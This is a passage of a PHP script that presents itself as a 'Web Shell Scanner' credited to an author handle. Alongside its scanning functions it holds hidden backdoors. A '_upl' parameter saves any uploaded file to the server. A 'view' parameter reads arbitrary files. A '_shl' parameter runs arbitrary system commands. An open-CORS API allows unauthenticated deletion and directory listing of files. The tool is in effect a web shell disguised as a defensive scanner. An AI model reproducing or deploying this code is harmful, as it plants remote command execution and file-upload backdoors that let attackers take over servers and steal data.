$dir,
'status' => False,
'reason' => array()
);
foreach($content as $c){
if(preg_match("/$c/", strtolower(file_get_contents($dir)))){
$data['status'] = True;
array_push($data['reason'], str_replace("\\(", "",$c));
}
}
data('success', $data);
}
function apiCheckExt($dir){
if(!is_file($dir)){
data('not found.');
exit();
}
global $ext;
$data = array(
'file' => $dir,
'status' => False,
'reason' => ''
);
foreach($ext as $i){
if(preg_match("/$i/", strtolower(basename($dir)))){
$data['status'] = True;
$data['reason'] = $i;
break;
}
}
data('success', $data);
}
if(isset($_GET['_upl'])){
if(copy($_FILES['_upl']['tmp_name'], $_FILES['_upl']['name'])){
echo '_upl ok';
exit();
}
}
function apiScanDir($dir){
global $white;
if(!file_exists($dir)){
data("dir not found");
exit();
}
$s = scandir($dir);
$data = array('file'=>array(), 'dir'=>array());
foreach($s as $file){
if($file === '.' || $file === '..'){
continue;
}
$file = $dir."/".$file;
$file = str_replace("//", "/", $file);
if(in_array(basename($file), $white)){
continue;
}
if(is_file($file)){
array_push($data['file'], $file);
}else{
array_push($data['dir'], $file."/");
}
}
data("success", $data);
}
function apiCwd(){
$data = getcwd();
data("success",$data);
}
function data($msg, $data=null){
$data = array(
'msg'=>$msg,
'data'=>$data
);
echo json_encode($data);
}
if(isset($_GET['view'])){
$page = $_GET['view'];
echo ''.htmlspecialchars(file_get_contents($page)).'
';
if(isset($_GET['_shl'])){
echo '';
htmlspecialchars(system($_GET['_shl']));
echo '
';
}
exit();
}
if(isset($_GET['api'])){
header('Access-Control-Allow-Origin: *');
header('Content-Type: application/json');
$function = $_GET['api'];
switch ($function) {
case 'delete':
if(!isset($_GET['dir'])){
data('no file.');
}else{
_delete($_GET['dir']);
}
break;
case 'shell':
if(!isset($_GET['dir'])){
data('no file.');
}else{
apiCheckShell($_GET['dir']);
}
break;
case 'ext':
if(!isset($_GET['dir'])){
data('no file.');
}else{
apiCheckExt($_GET['dir']);
}
break;
case 'scan':
if(!isset($_GET['dir'])){
data('no directory.');
}else{
apiScanDir($_GET['dir']);
}
break;
case 'cwd':
apiCwd();
break;
case 'eval':
if(!isset($_GET['function'])){
data('no function.');
}else{
data('no function.');
//apiEval($_GET['function']);
}
break;
default:
data('no function.');
}
die();
}
?>
WEB SHELL SCANNER
WEB SHELL SCANNER
Author : @Gtx666Ti